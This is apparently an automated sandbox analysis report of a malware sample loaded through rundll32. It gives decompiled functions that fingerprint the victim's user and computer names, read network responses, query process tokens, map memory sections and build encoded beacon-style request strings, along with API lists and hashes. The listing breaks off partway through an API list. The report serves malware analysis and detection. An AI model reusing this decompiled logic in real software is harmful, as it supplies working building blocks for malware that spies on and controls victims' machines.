                Function 04B91F55 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 252 4b91f55-4b91f69 253 4b91f6b-4b91f70 252->253 254 4b91f73-4b91f85 call 4b954f9 252->254 253->254 257 4b91fd9-4b91fe6 254->257 258 4b91f87-4b91f97 GetUserNameW 254->258 260 4b91fe8-4b91fff GetComputerNameW 257->260 259 4b91f99-4b91fa9 RtlAllocateHeap 258->259 258->260 259->260 261 4b91fab-4b91fb8 GetUserNameW 259->261 262 4b9203d-4b92061 260->262 263 4b92001-4b92012 RtlAllocateHeap 260->263 264 4b91fc8-4b91fd7 261->264 265 4b91fba-4b91fc6 call 4b96821 261->265 263->262 266 4b92014-4b9201d GetComputerNameW 263->266 264->260 265->264 268 4b9201f-4b9202b call 4b96821 266->268 269 4b9202e-4b92031 266->269 268->269 269->262
                C-Code - Quality: 96%
                			E04B91F55(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x4b9a310; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E04B954F9( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x4b9a344 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x4b9a2d8, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E04B96821(_v8 + _v8, _t64);
							}
							HeapFree( *0x4b9a2d8, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x4b9a2d8, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04B96821(_v8 + _v8, _t64);
						}
						HeapFree( *0x4b9a2d8, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                0x04b91f55
                0x04b91f5d
                0x04b91f61
                0x04b91f64
                0x04b91f69
                0x04b91f6b
                0x04b91f70
                0x04b91f70
                0x04b91f76
                0x04b91f78
                0x04b91f85
                0x04b91fe6
                0x04b91f87
                0x04b91f8c
                0x04b91f92
                0x04b91f97
                0x04b91fa5
                0x04b91fa9
                0x04b91fb8
                0x04b91fbf
                0x04b91fc6
                0x04b91fc6
                0x04b91fd1
                0x04b91fd1
                0x04b91fa9
                0x04b91f97
                0x04b91fe8
                0x04b91fee
                0x04b91ff8
                0x04b91ffa
                0x04b91fff
                0x04b9200e
                0x04b92012
                0x04b9201d
                0x04b92024
                0x04b9202b
                0x04b9202b
                0x04b92037
                0x04b92037
                0x04b92012
                0x04b92042
                0x04b92044
                0x04b92047
                0x04b92049
                0x04b9204c
                0x04b9204f
                0x04b92059
                0x04b9205d
                0x04b92061

                APIs
                • GetUserNameW.ADVAPI32(00000000,?), ref: 04B91F8C
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04B91FA3
                • GetUserNameW.ADVAPI32(00000000,?), ref: 04B91FB0
                • HeapFree.KERNEL32(00000000,00000000), ref: 04B91FD1
                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04B91FF8
                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04B9200C
                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04B92019
                • HeapFree.KERNEL32(00000000,00000000), ref: 04B92037
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: HeapName$AllocateComputerFreeUser
                • String ID: Uet
                • API String ID: 3239747167-2766386878
                • Opcode ID: e61272b2e60707d87a6b0439ec25efc09063eedcbc71801f1b345ba6cff6be0b
                • Instruction ID: b81e9680871b73801a4134db98c093b0885b3136495ad2eea511e7ee201fe463
                • Opcode Fuzzy Hash: e61272b2e60707d87a6b0439ec25efc09063eedcbc71801f1b345ba6cff6be0b
                • Instruction Fuzzy Hash: 1431DC71A00209AFEB11DFB9DD81B6EBBF9FB48200F5144BAE505D3250DB74EE05AB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B95E3A Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 112filenetworkCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 274 4b95e3a-4b95e67 ResetEvent InternetReadFile 275 4b95e69-4b95e77 274->275 276 4b95e98-4b95e9d 274->276 282 4b95e79-4b95e87 call 4b9705e 275->282 283 4b95e90-4b95e92 275->283 277 4b95f60 276->277 278 4b95ea3-4b95eb2 276->278 279 4b95f63-4b95f69 277->279 284 4b95eb8-4b95ec7 call 4b96601 278->284 285 4b95f5b-4b95f5e 278->285 282->279 289 4b95e8d 282->289 283->276 283->279 291 4b95f4d-4b95f4f 284->291 292 4b95ecd-4b95ed5 284->292 285->279 289->283 294 4b95f50-4b95f59 291->294 293 4b95ed6-4b95efb ResetEvent InternetReadFile 292->293 297 4b95efd-4b95f0b 293->297 298 4b95f24-4b95f29 293->298 294->279 300 4b95f34-4b95f3e call 4b94130 297->300 303 4b95f0d-4b95f1b call 4b9705e 297->303 299 4b95f2b-4b95f32 298->299 298->300 299->293 300->294 306 4b95f40-4b95f44 call 4b97adc 300->306 303->300 309 4b95f1d-4b95f22 303->309 310 4b95f49-4b95f4b 306->310 309->298 309->300 310->294
                C-Code - Quality: 70%
                			E04B95E3A(void* __eax) {
				long _v8;
				void* _v12;
				void* _v16;
				void _v20;
				void* __esi;
				void* _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				long _t45;
				void* _t53;
				long _t58;
				void* _t59;

				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				if(InternetReadFile( *(_t59 + 0x18),  &_v20, 4,  &_v8) != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0x4b9a174(0, 1,  &_v12); // executed
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E04B96601(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						if(InternetReadFile( *(_t59 + 0x18), _v16, 0x1000,  &_v8) != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E04B94130(_v16);
							if(_t58 == 0) {
								_t45 = E04B97ADC(_v12, _t59); // executed
								_t58 = _t45;
							}
							goto L18;
						}
						_t58 = E04B9705E( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E04B9705E( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}















                0x04b95e49
                0x04b95e4e
                0x04b95e50
                0x04b95e67
                0x04b95e98
                0x04b95e9d
                0x04b95f60
                0x04b95f63
                0x04b95f69
                0x04b95f69
                0x04b95eaa
                0x04b95eb2
                0x04b95f5d
                0x00000000
                0x04b95f5d
                0x04b95ebd
                0x04b95ec2
                0x04b95ec7
                0x04b95f4f
                0x04b95f50
                0x04b95f50
                0x04b95f56
                0x00000000
                0x04b95f56
                0x04b95ecd
                0x04b95ecf
                0x04b95ed5
                0x04b95ed6
                0x04b95ed6
                0x04b95ed9
                0x04b95edc
                0x04b95ee2
                0x04b95efb
                0x00000000
                0x00000000
                0x04b95f03
                0x04b95f0b
                0x04b95f34
                0x04b95f37
                0x04b95f3e
                0x04b95f44
                0x04b95f49
                0x04b95f49
                0x00000000
                0x04b95f3e
                0x04b95f17
                0x04b95f1b
                0x00000000
                0x00000000
                0x04b95f1d
                0x04b95f22
                0x00000000
                0x00000000
                0x04b95f24
                0x04b95f24
                0x04b95f29
                0x00000000
                0x00000000
                0x04b95f2b
                0x04b95f2c
                0x04b95f2f
                0x04b95f2f
                0x04b95ed6
                0x04b95e6f
                0x04b95e77
                0x04b95e90
                0x04b95e92
                0x00000000
                0x00000000
                0x00000000
                0x04b95e92
                0x04b95e83
                0x04b95e87
                0x00000000
                0x00000000
                0x04b95e8d
                0x00000000

                APIs
                • ResetEvent.KERNEL32(?), ref: 04B95E50
                • InternetReadFile.WININET(?,?,00000004,?), ref: 04B95E5F
                • GetLastError.KERNEL32 ref: 04B95E69
                  • Part of subcall function 04B9705E: WaitForMultipleObjects.KERNEL32(00000002,04B97CEC,00000000,04B97CEC,?,?,?,04B97CEC,0000EA60), ref: 04B97079
                • ResetEvent.KERNEL32(?), ref: 04B95EE2
                • InternetReadFile.WININET(?,?,00001000,?), ref: 04B95EF3
                • GetLastError.KERNEL32 ref: 04B95EFD
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: ErrorEventFileInternetLastReadReset$MultipleObjectsWait
                • String ID: @MetNet
                • API String ID: 3290165071-2109406137
                • Opcode ID: 369b2d6851f657aac339cc50262bf1f935131c83deaf61ca5f8e1ad8fe99f053
                • Instruction ID: 436c70aba5059fea60585ff0936d6d1e3d5e7e74cd9f10884de234431a2250ad
                • Opcode Fuzzy Hash: 369b2d6851f657aac339cc50262bf1f935131c83deaf61ca5f8e1ad8fe99f053
                • Instruction Fuzzy Hash: 44318D33A40608BBDF329FA5CC44BAEB7F9EF88660F2405B8E51597190EA71FD059B10
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B96940 Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 38%
                			E04B96940(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E04B96601(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E04B94130(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                0x04b9694d
                0x04b9694e
                0x04b9694f
                0x04b96950
                0x04b96951
                0x04b96955
                0x04b9695c
                0x04b9696b
                0x04b9696e
                0x04b96971
                0x04b96978
                0x04b9697b
                0x04b9697e
                0x04b96981
                0x04b96984
                0x04b9698f
                0x04b96991
                0x04b9699a
                0x04b969a2
                0x04b969a4
                0x04b969b6
                0x04b969c0
                0x04b969c4
                0x04b969d3
                0x04b969d7
                0x04b969e0
                0x04b969e8
                0x04b969e8
                0x04b969ea
                0x04b969ea
                0x04b969f2
                0x04b969f8
                0x04b969fc
                0x04b969fc
                0x04b96a07

                APIs
                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04B96987
                • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04B9699A
                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04B969B6
                  • Part of subcall function 04B96601: RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04B969D3
                • memcpy.NTDLL(?,00000000,0000001C), ref: 04B969E0
                • NtClose.NTDLL(?), ref: 04B969F2
                • NtClose.NTDLL(00000000), ref: 04B969FC
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                • String ID:
                • API String ID: 2575439697-0
                • Opcode ID: 6997555519f22a194f785c1efdd80da2ed71b193a6464e80f33c7a6659ee8626
                • Instruction ID: 7a2712cd09030288a0be50424debfe2bf028fd4590a550d3e506007a78450c19
                • Opcode Fuzzy Hash: 6997555519f22a194f785c1efdd80da2ed71b193a6464e80f33c7a6659ee8626
                • Instruction Fuzzy Hash: 4921E5B2900228BBDF019FA5DD85ADEBFBDEB08740F10406AF905A6210D7719F559BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040154A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                Download Yara Rule
                C-Code - Quality: 72%
                			E0040154A(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E004015F2(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                0x00401553
                0x0040155a
                0x0040155b
                0x0040155c
                0x0040155d
                0x0040155e
                0x0040156f
                0x00401573
                0x00401587
                0x0040158a
                0x0040158d
                0x00401594
                0x00401597
                0x0040159e
                0x004015a1
                0x004015a4
                0x004015a7
                0x004015ac
                0x004015e7
                0x004015ae
                0x004015b1
                0x004015b7
                0x004015bc
                0x004015c0
                0x004015de
                0x004015c2
                0x004015c9
                0x004015d7
                0x004015d7
                0x004015c0
                0x004015ef

                APIs
                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74654EE0,00000000,00000000,?), ref: 004015A7
                  • Part of subcall function 004015F2: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,004015BC,00000002,00000000,?,?,00000000,?,?,004015BC,00000002), ref: 0040161F
                • memset.NTDLL ref: 004015C9
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: Section$CreateViewmemset
                • String ID: @
                • API String ID: 2533685722-2766056989
                • Opcode ID: 50ebc0e7910a9978d18594c078614fee92139703ade7f927945fe33411ca7c4f
                • Instruction ID: 8f7a861332155e55fc798b9a5ff1eb39cd95682b7b2c8284a926e1e2da6734f8
                • Opcode Fuzzy Hash: 50ebc0e7910a9978d18594c078614fee92139703ade7f927945fe33411ca7c4f
                • Instruction Fuzzy Hash: 02210BB5D00209AFCB11DFA9C8849DEFBF9FB48354F10443AE506F7250D7349A458BA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004015F2 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E004015F2(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                0x00401604
                0x0040160a
                0x00401618
                0x0040161f
                0x00401624
                0x0040162a
                0x00000000
                0x0040162b
                0x00000000

                APIs
                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,004015BC,00000002,00000000,?,?,00000000,?,?,004015BC,00000002), ref: 0040161F
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: SectionView
                • String ID:
                • API String ID: 1323581903-0
                • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                • Instruction ID: aa2898b9334881c296675e76828b4d1ae1dd7b7995b8c31620b7b262b2f1fdab
                • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                • Instruction Fuzzy Hash: 5AF012B590460CBFDB119FA5CC85CAFBBBDEB44354F104D3AF152E10A0D6719E089A60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B96BEF Relevance: 47.5, APIs: 25, Strings: 2, Instructions: 222memorystringCOMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 69%
                			E04B96BEF(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				intOrPtr _t30;
				void* _t31;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				void* _t40;
				intOrPtr _t41;
				int _t44;
				intOrPtr _t45;
				int _t48;
				void* _t49;
				intOrPtr _t53;
				intOrPtr _t59;
				intOrPtr _t63;
				intOrPtr* _t65;
				void* _t66;
				intOrPtr _t71;
				intOrPtr _t77;
				intOrPtr _t80;
				intOrPtr _t83;
				int _t86;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t93;
				int _t96;
				void* _t98;
				void* _t99;
				void* _t103;
				void* _t105;
				void* _t106;
				intOrPtr _t107;
				long _t109;
				intOrPtr* _t110;
				intOrPtr* _t111;
				long _t112;
				int _t113;
				void* _t114;
				void* _t115;
				void* _t116;
				void* _t119;
				void* _t120;
				void* _t122;
				void* _t123;

				_t103 = __edx;
				_t99 = __ecx;
				_t120 =  &_v16;
				_t112 = __eax;
				_t30 =  *0x4b9a3e0; // 0x5109cf0
				_v4 = _t30;
				_v8 = 8;
				_t31 = RtlAllocateHeap( *0x4b9a2d8, 0, 0x800); // executed
				_t98 = _t31;
				if(_t98 != 0) {
					if(_t112 == 0) {
						_t112 = GetTickCount();
					}
					_t33 =  *0x4b9a018; // 0x2e793154
					asm("bswap eax");
					_t34 =  *0x4b9a014; // 0x3a87c8cd
					asm("bswap eax");
					_t35 =  *0x4b9a010; // 0xd8d2f808
					asm("bswap eax");
					_t36 =  *0x4b9a00c; // 0x13d015ef
					asm("bswap eax");
					_t37 =  *0x4b9a348; // 0x56d5a8
					_t3 = _t37 + 0x4b9b62b; // 0x74666f73
					_t113 = wsprintfA(_t98, _t3, 2, 0x3d18a, _t36, _t35, _t34, _t33,  *0x4b9a02c,  *0x4b9a004, _t112);
					_t40 = E04B967F4();
					_t41 =  *0x4b9a348; // 0x56d5a8
					_t4 = _t41 + 0x4b9b66b; // 0x74707526
					_t44 = wsprintfA(_t113 + _t98, _t4, _t40);
					_t122 = _t120 + 0x38;
					_t114 = _t113 + _t44;
					if(_a12 != 0) {
						_t93 =  *0x4b9a348; // 0x56d5a8
						_t8 = _t93 + 0x4b9b676; // 0x732526
						_t96 = wsprintfA(_t114 + _t98, _t8, _a12);
						_t122 = _t122 + 0xc;
						_t114 = _t114 + _t96;
					}
					_t45 =  *0x4b9a348; // 0x56d5a8
					_t10 = _t45 + 0x4b9b2de; // 0x74636126
					_t48 = wsprintfA(_t114 + _t98, _t10, 0);
					_t123 = _t122 + 0xc;
					_t115 = _t114 + _t48; // executed
					_t49 = E04B924C5(_t99); // executed
					_t105 = _t49;
					if(_t105 != 0) {
						_t88 =  *0x4b9a348; // 0x56d5a8
						_t12 = _t88 + 0x4b9b8c2; // 0x736e6426
						_t91 = wsprintfA(_t115 + _t98, _t12, _t105);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t91;
						HeapFree( *0x4b9a2d8, 0, _t105);
					}
					_t106 = E04B96173();
					if(_t106 != 0) {
						_t83 =  *0x4b9a348; // 0x56d5a8
						_t14 = _t83 + 0x4b9b8ca; // 0x6f687726
						_t86 = wsprintfA(_t115 + _t98, _t14, _t106);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t86;
						HeapFree( *0x4b9a2d8, 0, _t106);
					}
					_t107 =  *0x4b9a3cc; // 0x5109600
					_a20 = E04B96107(0x4b9a00a, _t107 + 4);
					_t53 =  *0x4b9a36c; // 0x51095b0
					_t109 = 0;
					if(_t53 != 0) {
						_t80 =  *0x4b9a348; // 0x56d5a8
						_t17 = _t80 + 0x4b9b889; // 0x3d736f26
						wsprintfA(_t115 + _t98, _t17, _t53);
					}
					if(_a20 != _t109) {
						_t116 = RtlAllocateHeap( *0x4b9a2d8, _t109, 0x800);
						if(_t116 != _t109) {
							E04B952F6(GetTickCount());
							_t59 =  *0x4b9a3cc; // 0x5109600
							__imp__(_t59 + 0x40);
							asm("lock xadd [eax], ecx");
							_t63 =  *0x4b9a3cc; // 0x5109600
							__imp__(_t63 + 0x40);
							_t65 =  *0x4b9a3cc; // 0x5109600
							_t66 = E04B95D8A(1, _t103, _t98,  *_t65); // executed
							_t119 = _t66;
							asm("lock xadd [eax], ecx");
							if(_t119 != _t109) {
								StrTrimA(_t119, 0x4b99294);
								_push(_t119);
								_t71 = E04B927B3();
								_v20 = _t71;
								if(_t71 != _t109) {
									_t110 = __imp__;
									 *_t110(_t119, _v8);
									 *_t110(_t116, _v8);
									_t111 = __imp__;
									 *_t111(_t116, _v32);
									 *_t111(_t116, _t119);
									_t77 = E04B9469F(0xffffffffffffffff, _t116, _v28, _v24); // executed
									_v56 = _t77;
									if(_t77 != 0 && _t77 != 0x10d2) {
										E04B9554C();
									}
									HeapFree( *0x4b9a2d8, 0, _v48);
									_t109 = 0;
								}
								RtlFreeHeap( *0x4b9a2d8, _t109, _t119); // executed
							}
							RtlFreeHeap( *0x4b9a2d8, _t109, _t116); // executed
						}
						HeapFree( *0x4b9a2d8, _t109, _a12);
					}
					RtlFreeHeap( *0x4b9a2d8, _t109, _t98); // executed
				}
				return _v16;
			}


























































                0x04b96bef
                0x04b96bef
                0x04b96bef
                0x04b96c04
                0x04b96c06
                0x04b96c0b
                0x04b96c0f
                0x04b96c17
                0x04b96c1d
                0x04b96c21
                0x04b96c29
                0x04b96c31
                0x04b96c31
                0x04b96c33
                0x04b96c3f
                0x04b96c4e
                0x04b96c53
                0x04b96c56
                0x04b96c5b
                0x04b96c5e
                0x04b96c63
                0x04b96c66
                0x04b96c72
                0x04b96c7f
                0x04b96c81
                0x04b96c87
                0x04b96c8c
                0x04b96c97
                0x04b96c99
                0x04b96c9c
                0x04b96ca2
                0x04b96ca4
                0x04b96cad
                0x04b96cb8
                0x04b96cba
                0x04b96cbd
                0x04b96cbd
                0x04b96cbf
                0x04b96cc4
                0x04b96cd0
                0x04b96cd2
                0x04b96cd5
                0x04b96cd7
                0x04b96cdc
                0x04b96ce0
                0x04b96ce2
                0x04b96ce7
                0x04b96cf3
                0x04b96cf5
                0x04b96d01
                0x04b96d03
                0x04b96d03
                0x04b96d0e
                0x04b96d12
                0x04b96d14
                0x04b96d19
                0x04b96d25
                0x04b96d27
                0x04b96d33
                0x04b96d35
                0x04b96d35
                0x04b96d3b
                0x04b96d4e
                0x04b96d52
                0x04b96d57
                0x04b96d5b
                0x04b96d5e
                0x04b96d63
                0x04b96d6d
                0x04b96d6f
                0x04b96d76
                0x04b96d8e
                0x04b96d92
                0x04b96d9e
                0x04b96da3
                0x04b96dac
                0x04b96dbd
                0x04b96dc1
                0x04b96dca
                0x04b96dd0
                0x04b96dd8
                0x04b96ddd
                0x04b96dea
                0x04b96df0
                0x04b96dfc
                0x04b96e02
                0x04b96e03
                0x04b96e08
                0x04b96e0e
                0x04b96e14
                0x04b96e1b
                0x04b96e22
                0x04b96e28
                0x04b96e2f
                0x04b96e33
                0x04b96e3e
                0x04b96e43
                0x04b96e49
                0x04b96e52
                0x04b96e52
                0x04b96e63
                0x04b96e69
                0x04b96e69
                0x04b96e73
                0x04b96e73
                0x04b96e81
                0x04b96e81
                0x04b96e92
                0x04b96e92
                0x04b96ea0
                0x04b96ea0
                0x04b96eb1

                APIs
                • RtlAllocateHeap.NTDLL ref: 04B96C17
                • GetTickCount.KERNEL32 ref: 04B96C2B
                • wsprintfA.USER32 ref: 04B96C7A
                • wsprintfA.USER32 ref: 04B96C97
                • wsprintfA.USER32 ref: 04B96CB8
                • wsprintfA.USER32 ref: 04B96CD0
                • wsprintfA.USER32 ref: 04B96CF3
                • HeapFree.KERNEL32(00000000,00000000), ref: 04B96D03
                • wsprintfA.USER32 ref: 04B96D25
